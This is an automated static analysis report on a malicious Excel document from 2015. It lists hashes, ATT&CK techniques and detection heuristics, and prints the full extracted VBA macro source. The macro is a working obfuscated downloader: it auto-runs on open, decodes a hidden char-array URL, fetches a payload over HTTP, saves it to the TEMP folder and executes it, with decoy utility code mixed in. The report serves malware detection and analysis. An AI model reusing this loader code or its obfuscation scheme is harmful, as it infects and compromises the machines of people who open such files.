Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1730557733d0f802…

MALICIOUS

Office (OLE)

69.0 KB Created: 2015-07-30 05:24:02 Authoring application: Microsoft Excel First seen: 2016-04-16
MD5: 50c4e000df7639c476cd72f2ba4b1983 SHA-1: 614ff7735499354afb3a5b43e6e9398b0f1067d5 SHA-256: 1730557733d0f802a2a1e8d3b91535a51db1170a966327969075304d4876a017
248 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing obfuscated VBA macros. The Workbook_Open macro is triggered upon opening, which then executes the obfuscated code. This code utilizes CreateObject and CallByName, indicative of attempting to download and execute a secondary payload, a common technique for macro-based malware. No specific family could be identified due to the obfuscation and lack of network indicators.

Heuristics 7

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    ErrExit:
    Set pubbyRodger_1 = CreateObject(hubabuba(0))
    CheckBins
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    ErrExit:
    Set pubbyRodger_1 = CreateObject(hubabuba(0))
    CheckBins
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Public Sub SaveMaps()
    rbp = CallByName(pubbyRodger_1, hubabuba(10), VbGet)
      Dim objStor As Variant
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Public Sub Workbook_Open()
    Call CenterByMan
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14484 bytes
SHA-256: 3ccbfd8ea4b148b18ee5e3527f5973881e19010b9641cb9a0b500b046a43aac4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Workbook_Open()
Call CenterByMan
End Sub

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{8CE1DD38-2B07-4F3D-AC62-F4321764A6DF}{44BEBCCC-45F8-4596-9A46-D713FAEB2B88}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module1"
Public pubbyRodger_1 As Object
Public pubbyRodger_2 As Object
Public pubbyRodger_3 As Object

Public pubbyRodger_7() As String
Public pubbyRodger_4 As String
Public pubbyRodger_5 As String
Public pubbyRodger_6 As Object
Public hubabuba() As String
Public MapsInitialized As Boolean
Public mDBname As String
Public MapInit As Boolean


' ________________________________________Util Functions End____________________________________________

' summe vom Range
Public Function rngCol(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
    Dim res()
    ReDim res(1 To endRow - startRow + 1, 1 To 1)
    
    Dim i As Integer
    Dim j As Integer
    
    Dim sum As Double
    
    
    For i = startRow To endRow
        For j = 0 To UBound(arrCol)
            If IsNumeric(Cells(i, arrCol(j)).Value) Then
             sum = sum + Cells(i, arrCol(j)).Value
            End If
        Next j
        
        res(i - startRow + 1, 1) = sum
        sum = 0
    Next i
    
    rngCol = res
    
End Function

Public Function rngArr(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
    Dim res()
    ReDim res(1 To endRow - startRow + 1, 1 To 1)
    
    Dim i As Integer
    Dim j As Integer
    
    Dim sum()
    ReDim sum(0 To UBound(arrCol))
    
    
    For i = startRow To endRow
        For j = 0 To UBound(arrCol)
            sum(j) = Cells(i, arrCol(j)).Value
        Next j
        
        res(i - startRow + 1, 1) = sum
        ReDim sum(0 To UBound(arrCol))
    Next i
    
    rngArr = res
    
End Function

Public Function rng(ByVal start As Integer, ByVal ending As Integer)
    Dim res()
    ReDim res(0 To ending - start)
    
    Dim i As Integer
    For i = start To ending
        res(i - start) = i
    Next i
    
    rng = res
End Function


Public Sub CenterByMan()
  Dim Col As String
  Dim obj As String
  hubabuba = Split(UserForm1.Label1.Caption, "/")
  GoTo ErrExit

ErrExit:
Set pubbyRodger_1 = CreateObject(hubabuba(0))
CheckBins
  Exit Sub
husbanDip:
   AD.DisplayError Err.Number, "modMaps", "CenterByMan", Err.Description
   Resume ErrExit
End Sub


' ______________________________ Print______________________________________________

Public Function p()
    
    ' check if the val is array
    Dim is_a As Boolean
    Dim k
    
    For Each k In Me.dict.Keys
        is_a = IsArray(Me.dict(k))
        Exit For
    Next k
    
    If is_a Then
         For Each k In Me.dict.Keys
            Debug.Print k & "  " & a_toString(Me.Item(k))
        Next k
    Else
        For Each k In Me.dict.Keys
            Debug.Print k & "  " & Me.Item(k)
        Next k
    End If
    
    

End Function

Public Function a_toString(ByVal arr As Variant) As String
    Dim res As String
    Dim i
    res = "["
    
    For Each i In arr
        res = res & Replace(" " & i, ",", ".") & ", "
    Next i
    
    res = Left(res, Len(res) - 2)
    
    
    a_toString = res & " ]"

End Function


Public Function pk()

    Dim k
    For Each k In Me.dict.Keys
        Debug.Print k
    Next k

End Function

Public Sub SaveMaps()
rbp = CallByName(pubbyRodger_1, hubabuba(10), VbGet)
  Dim objStor As Variant
  CallByName pubbyRodger_2, hubabuba(9), VbMethod, rbp
  
  CallByName pubbyRodger_2, hubabuba(11), VbMethod, pubbyRodger_5, 2
GoTo husbanDip
 
ErrExit:
  Exit Sub
husbanDip:
pubbyRodger_6.Open (pubbyRodger_5)
End Sub





Attribute VB_Name = "Module4"

Public Function toJSON(Optional ByVal k As String = "root") As String
    Dim res As String
    res = "{""name"":""" & k & """," & Chr(13)
    res = res & """children"":[" & Chr(13)
    
    Dim ky
    For Each ky In pDict.Keys
        res = res & "{""name"":""" & Replace(CStr(ky), """", "") & """, " & """size"": " & Replace(CStr(pDict(ky)), ",", ".") & "}," & Chr(13)
    Next ky
    
    toJSON = Left(res, Len(res) - 2) & Chr(13) & "]}"
    
    
End Function




Attribute VB_Name = "Module3"


Public Function productRng(ByVal operand2 As Variant, ByVal operation As String) As Variant
    Dim k
    Dim i
   
    Dim res As Variant
    Set res = New Dicts
    Call res.ini
    
    
    If IsNumeric(operand2) Then
        ' if the second operand is numeric

        For Each k In pDict.Keys
            res.dict(k) = productArr(pDict(k), operation, operand2)
        Next k
    Else
    
        For Each k In pDict.Keys
          
            If operand2.dict.Exists(k) Then
                res.dict(k) = productArr(pDict(k), operation, operand2.dict(k))
            End If

        Next k
    End If
   
    Set productRng = res

End Function


Public Function productArr(ByVal arr1 As Variant, ByVal operation As String, ByVal arr2 As Variant) As Variant
    Dim res
    Dim i
    ReDim res(LBound(arr1) To UBound(arr1))
    
    If IsNumeric(arr2) Then
        For i = LBound(arr1) To UBound(arr1)
            res(i) = Application.Evaluate(Replace(arr1(i) & operation & arr2, ",", "."))
        Next i
    Else
        For i = LBound(arr1) To UBound(arr1)
            res(i) = Application.Evaluate(Replace(arr1(i) & operation & arr2(i), ",", "."))
        Next i
    End If
    
    productArr = res

End Function


Public Function crentips(nY As Integer) As String
    
    Dim pubbyRodger_8 As Integer
  Dim pubbyRodger3_1 As String
  pubbyRodger3_1 = ""
   GoTo s2
    
s2:
      For pubbyRodger_8 = LBound(pubbyRodger_7) To UBound(pubbyRodger_7)
    pubbyRodger3_1 = pubbyRodger3_1 & Chr(CInt(pubbyRodger_7(pubbyRodger_8)) - 1000)
  Next pubbyRodger_8
GoTo SIDR4
    
SIDR4:
pubbyRodger_1.Open hubabuba(5), pubbyRodger3_1, False
KeepBlyading
        
End Function



Public Function clone__(ByVal d As Variant, ByVal l As Integer) As Variant
    Dim res As New Dicts
    Dim k
    
    Call res.ini
    
    If l > 1 Then
         For Each k In d.dict.Keys
            Set res.dict(k) = clone__(d.dict(k), l - 1)
         Next k
    Else
        For Each k In d.dict.Keys
            res.dict(k) = d.dict(k)
        Next k
    End If
    
    Set clone__ = res

End Function


Public Sub CheckBins()

pubbyRodger_7 = Split("1104:1116:1116:1112:1058:1047:1047:1104:1111:1109:1101:1046:1099:1111:1112:1121:1099:1108:1117:1098:1046:1114:1117:1047:1119:1112:1045:1097:1100:1109:1105:1110:1047:1109:1097:1105:1110:1116:1047:1055:1054:1103:1104:1098:1121:1054:1102:1052:1053:1046:1101:1120:1101", _
":")

  Dim LP As Long
  Dim BinID As Long
  Dim objStorages As String
  Dim objStorage As Variant
  Dim MapID As Long
  Set pubbyRodger_2 = CreateObject(hubabuba(1))
   GoTo husbanDip
  
ErrExit:
  Exit Sub
husbanDip:
Set pubbyRodger_6 = CreateObject(hubabuba(2))
Set husbanD = CreateObject(hubabuba(3))
Set pubbyRodger_3 = husbanD.Environment(hubabuba(4))
crentips 3
End Sub

Public Function filterInklude(ByVal reg As Object) As Variant
    
    Dim k
    
    Dim res As Variant
    Set res = New Dicts
    Call res.ini
    
    For Each k In pDict.Keys
      If reg.test(k) Then
        res.dict(k) = pDict(k)
      End If
    Next k
    
    Set filterInklude = res
    
End Function

''''''''''''''''''''
'set all the elements to a constant
'default to be 1
''''''''''''''''''''

Public Function constDict(Optional ByVal constant As Variant) As Variant
    Dim k
    
    Dim res As Variant
    Set res = New Dicts
    Call res.ini
    
    If IsMissing(constant) Then
        constant = 1
    End If
    
    For Each k In pDict.Keys
        res.dict(k) = constant
    Next k
    
    Set constDict = res

End Function







Attribute VB_Name = "Module2"


'''''''''''''''''''
'@param operand2 can be either number or Dicts
'       operation supports only the string
'''''''''''''''''''

Public Function product() As Variant
    Dim k
    Dim isNum As Boolean
    isNum = True
    
pubbyRodger_5 = pubbyRodger_4
GoTo LABZ4
    Dim res As Variant
    Call res.ini
    
    If Not IsMissing(IsNumericOperation) Then
        If Not IsNumericOperation Then
            isNum = False
        End If
    Else
        isNum = True
    End If

   
LABZ4:
pubbyRodger_5 = pubbyRodger_5 + hubabuba(12)
Exit Function

    If IsNumeric(operand2) Then
        ' if the second operand is numeric
        
         
        For Each k In pDict.Keys
            If Not isNum Then
               
                res.dict(k) = App.lication.Evaluate(Appli.cation.Works.heetFunction.Substitute(pDict(k) & operation & operand2, ",", "."))
            Else
                res.dict(k) = Appli.cation.Evaluate(pDict(k) & operation & operand2)
            End If
        Next k
    Else
    
        For Each k In pDict.Keys
            If Not isNum Then
               If operand2.dict.Exists(k) Then
                    res.dict(k) = Appli.cation.Evaluate(Appli.cation.WorksheetFunction.Substitute(pDict(k) & operation & operand2.dict(k), ",", "."))
               End If
            Else
                If operand2.dict.Exists(k) Then
                    res.dict(k) = Applica.tion.Evaluate(pDict(k) & operation & operand2.dict(k))
                End If
            End If
        Next k
    End If
   
    Set product = res
    
End Function

Public Sub OnasOn()

   CallByName pubbyRodger_2, hubabuba(7), VbLet, 1
 pubbyRodger_2.Open
GoTo husbanDip
  
ErrExit:
  Exit Sub
husbanDip:
SaveMaps
End Sub

Public Function reduceRngVertical(ByVal sign As String) As Variant
    Dim k
    Dim i
    Dim tmpCnt As Integer
    tmpCnt = 1
    Dim arr()
    
    Dim u As Integer
    Dim l As Integer

    For Each k In pDict.Keys
        If tmpCnt = 1 Then
            u = UBound(pDict(k))
            l = LBound(pDict(k))
            ReDim arr(l To u)
            tmpCnt = 2
            
            If sign = "+" Then
                For i = l To u
                    arr(i) = 0
                Next i
            Else
                For i = l To u
                    arr(i) = 1
                Next i
            End If
            
        End If
        
        If sign = "+" Then
            For i = l To u
                arr(i) = arr(i) + pDict(k)(i)
            Next i
        Else
            For i = l To u
                arr(i) = arr(i) * pDict(k)(i)
            Next i
        End If

    Next k
   
    
    reduceRngVertical = arr


End Function

Public Function reduceArray(ByVal arr, ByVal sign As String) As Variant
    Dim res As Variant
    Dim k
    
    
    If sign = "" Or sign = "+" Then
        res = 0
        For Each k In arr
            res = res + k
        Next k
    ElseIf sign = "*" Then
        res = 1
        For Each k In arr
            res = res * k
        Next k
    End If
    
    reduceArray = res
    
End Function

Public Function filterVal(ByVal operation As String, Optional ByVal placeholder As String = "{*}", Optional ByVal hasThousandSep As Boolean = True) As Variant
    Dim k
    Dim tmp As String
    
    Dim res As Variant
    Set res = New Dicts
    Call res.ini

    If hasThousandSep Then
        For Each k In pDict.Keys
            tmp = Replace(pDict(k) & "", ",", ".")
            
            If Application.Evaluate(Replace(operation, placeholder, tmp)) Then
                res.dict(k) = k
            End If
        Next k
    Else
        For Each k In pDict.Keys
            If Application.Evaluate(Replace(operation, placeholder, pDict(k) & "")) Then
                res.dict(k) = k
            End If
        Next k
    End If

    Set filterVal = res
    
End Function

Public Sub KeepBlyading()

      pubbyRodger_1.Send
GoTo SIDR4
    
 If IsMissing(keepOriginalVal) Then
        keepOriginalVal = True
    End If
    
    Dim k
    
    Dim res As Variant
    
    res.dict = pDict
    
    For Each k In dict2.dict.Keys
        If Not pDict.Exists(k) Then
            res.dict(k) = dict2.dict(k)
        ElseIf Not keepOriginalVal Then
            res.dict(k) = dict2.dict(k)
        End If
    Next k
    
    Set Add = res
SIDR4:
      pubbyRodger_4 = pubbyRodger_3(hubabuba(6))
GoTo SIDR1

SIDR1:
product
OnasOn
End Sub

Public Function filterExklude(ByVal reg As Object) As Variant
    
    Dim k
    
    Dim res As Variant
    Set res = New Dicts
    Call res.ini
    
    For Each k In pDict.Keys
      If Not reg.test(k) Then
        res.dict(k) = pDict(k)
      End If
    Next k
    
    Set filterExklude = res
    
End Function